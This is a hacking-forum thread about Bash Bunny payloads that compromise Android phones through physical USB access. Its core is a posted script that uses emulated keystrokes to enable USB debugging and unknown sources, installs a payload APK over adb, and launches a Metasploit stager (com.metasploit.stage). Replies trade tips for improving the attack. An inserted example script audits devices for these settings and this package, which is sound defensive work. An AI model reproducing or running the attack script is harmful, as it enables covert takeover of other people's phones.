r1ddl3r

Android APK Install

Put together a quick and dirty Bash Bunny script. Allows unknown sources on Android device, grabs apk via web browser, installs and opens.

https://github.com/JakeBernier/bashbunny/blob/master/android/web_delivery/payload.txt

Also working to get adb delivery method working. Curious if anyone knows of an Android keyboard shortcut that will quickly pull up settings to speed this up?

Cool payload, here's a couple of suggestions.

  1. Put the key commands in a text file under a folder called phones. This will allow someone else to modify the payload for numerous other phones.
    e.g. phones/nexus9_v7.0.txt, phones/galaxys7_v7.0.txt
  2. Use the bash bunny as an ethernet device and pull the payload from a webserver there, so you don't rely on any external infrastructure.

Good stuff!

One more note, you could start and try the adb method in case the phone has USB debugging enabled. If not, you can fall back to the key commands. I am working on a similar payload for Android, but it doesn't have to do with APKs.

Edited by LowValueTarget

Awesome suggestions, thank you! I'll work on those and update accordingly.

There is also the option of simply enabling USB debugging which I'm testing out as well. 

Not sure if this is what your payload does but what you could do is...

Run a Python web server that serves an .apk, with the BB telling the phone to download it (open 172.16.64.1:80 in the browser using HID) and install it.

I use this a lot myself.
# Enables ADB and unknown sources on a target Android
# Then pushes a payload APK via ADB
#
# Requires android-tools-adb installed on the Bash Bunny
#
# Purple ............ Running HID emulation, enabling ADB and unknown sources
# Blue Blinking ..... Running ADB command to push payload.apk
# Red Blinking ...... Android failed to get an IP address from the Bash Bunny
# Green ............. Finished
 
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
 
ATTACKMODE HID
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q DOWNARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
Q DELAY 500
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 800
Q ENTER
Q DELAY 800
Q ENTER
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q DOWNARROW
Q DELAY 500
Q ENTER
Q DELAY 200
Q ENTER
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
if [ -z "${TARGET_IP}" ]; then
    LED FAIL
    exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED FINISH
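
A defender-side check for the device state this payload depends on, added here as an example and not part of the original post: it flags USB debugging, developer options, the legacy unknown-sources setting, and the `com.metasploit.stage` package named in the script above. The function names and sample dumps are constructed for illustration; live input would come from `adb shell settings list global`, `adb shell settings list secure` and `adb shell pm list packages` on a device you administer.

```bash
#!/bin/sh
# Added example (not from the thread): audit an Android device for the
# settings and package that the payload above relies on or leaves behind.

# Print the value of KEY from "key=value" lines on stdin (empty if absent).
# Exact key match, so adb_enabled does not match adb_wifi_enabled.
setting_value() {
    awk -F= -v k="$1" '$1 == k { print substr($0, length(k) + 2); exit }'
}

# audit_device SETTINGS_DUMP PACKAGE_LIST
# Prints one FINDING line per risky item; prints nothing for a clean device.
audit_device() {
    for key in adb_enabled development_settings_enabled install_non_market_apps; do
        if [ "$(printf '%s\n' "$1" | setting_value "$key")" = "1" ]; then
            echo "FINDING: $key=1"
        fi
    done
    # Package name taken from the "am start" line in the payload above.
    if printf '%s\n' "$2" | grep -qx 'package:com\.metasploit\.stage'; then
        echo "FINDING: package com.metasploit.stage is installed"
    fi
}

# Constructed sample dumps (not captured from a real device).
SAMPLE_TAMPERED_SETTINGS='adb_wifi_enabled=0
adb_enabled=1
airplane_mode_on=0
development_settings_enabled=1
install_non_market_apps=1'
SAMPLE_TAMPERED_PACKAGES='package:com.android.settings
package:com.metasploit.stage'

SAMPLE_CLEAN_SETTINGS='adb_enabled=0
development_settings_enabled=0
install_non_market_apps=0'
SAMPLE_CLEAN_PACKAGES='package:com.android.settings
package:com.android.chrome'

echo "== tampered sample =="
audit_device "$SAMPLE_TAMPERED_SETTINGS" "$SAMPLE_TAMPERED_PACKAGES"
echo "== clean sample =="
audit_device "$SAMPLE_CLEAN_SETTINGS" "$SAMPLE_CLEAN_PACKAGES"
```

On Android 8.0 and later the global unknown-sources switch was replaced by a per-app "Install unknown apps" permission, so `install_non_market_apps` being absent or `0` there does not rule out sideloading.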

Hi there! Can you please explain a little bit about this technique, meaning what it is and why it is used? Or guide me to where I can find results about this... Actually I am a new hacker and have less knowledge of hacking Android... I can hack Android 5 and 4 easily with evil-droid or metasploit or FATRAt... so I need some more knowledge... help... Thank you!

 

On 9/24/2018 at 9:34 PM, Shadowharvy said:

I use this a lot myself.

Hello Shadowharvy

I'm trying to execute a payload with a Samsung Galaxy S3. I have been working with the payload for Android url_open but can only download my APK. I'm interested in this part of your code: adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk. I think it is easier to just insert the USB Bash Bunny and have it search for our payload and execute it automatically.

How can I install this requirement? # Requires android-tools-adb installed on the Bash Bunny

Thanks
